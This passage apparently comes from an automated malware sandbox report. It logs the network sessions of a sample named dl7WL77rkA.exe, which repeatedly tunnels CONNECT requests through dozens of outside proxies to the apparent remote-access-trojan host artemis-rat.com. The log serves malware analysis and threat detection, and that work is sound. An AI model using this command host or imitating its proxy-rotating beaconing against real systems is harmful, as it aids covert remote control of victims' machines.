                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1818192.168.2.55495338.54.116.981183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.131763935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.576684952 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1819192.168.2.55414215.235.187.227626403876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.152550936 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.217612028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1820192.168.2.55337292.204.135.37325243876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.152659893 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.217587948 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.217856884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1821192.168.2.554946103.153.154.6803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.152755976 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.590008020 CET | 343 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1822192.168.2.55077646.10.229.24380803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.167511940 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.217607021 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.217936993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.282689095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1823192.168.2.55099650.63.12.3393673876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.169635057 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.207628012 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.389537096 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1824192.168.2.555042147.75.92.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.175978899 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:46.451931953 CET | 65 | IN | HTTP/1.1 200 Connection Established
Proxy-Agent: Zscaler/6.3
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.545038939 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c d5 f7 8a 70 b5 e0 de 01 bc 7a b8 ac 89 8d 87 cb fe d0 ba a3 bc 62 b7 89 1b bc 25 4f 0c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhelpzb%O*,+0/$#('=<5/artemis-rat.com#xWT.ZPp&P\cR.g\w6gGV|r _w-N!ekkYS"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1825192.168.2.55499295.217.155.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.176337004 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.933475971 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:05.427083969 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:06.455970049 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:09.656127930 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:15.802413940 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:27.832113981 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:53.432292938 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1826192.168.2.555120104.19.233.117803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.176419020 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.331094027 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1827192.168.2.555121172.67.181.129803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.176419020 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.331001043 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1828192.168.2.55503846.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.181704998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1829192.168.2.551022162.214.170.144317013876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.183228970 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.207674026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.389549017 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.405194998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1830192.168.2.555020185.53.129.14131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.189877987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.933404922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.905179977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.811383963 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.514447927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.217194080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:00.905091047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1831192.168.2.5550378.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.205178976 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1832192.168.2.554259213.136.75.85590583876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.208097935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.207674980 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1833192.168.2.555030221.231.13.19810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.224260092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1834192.168.2.55090651.222.241.157300113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.232343912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1835192.168.2.555032208.109.14.49114263876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.235541105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1836192.168.2.554379192.99.207.129130033876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.235948086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.404937029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1837192.168.2.55507875.119.145.15475053876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.285281897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.092689037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092864037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.905265093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.592618942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.201941967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.904973030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1838192.168.2.554979109.194.22.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.285672903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1839192.168.2.55507546.101.179.4931293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.286345959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.083182096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014666080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014609098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717869043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:57.343377113 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:01.014370918 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1840192.168.2.55434451.222.241.157363633876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:46.290095091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.405093908 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.508866072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:58.514646053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
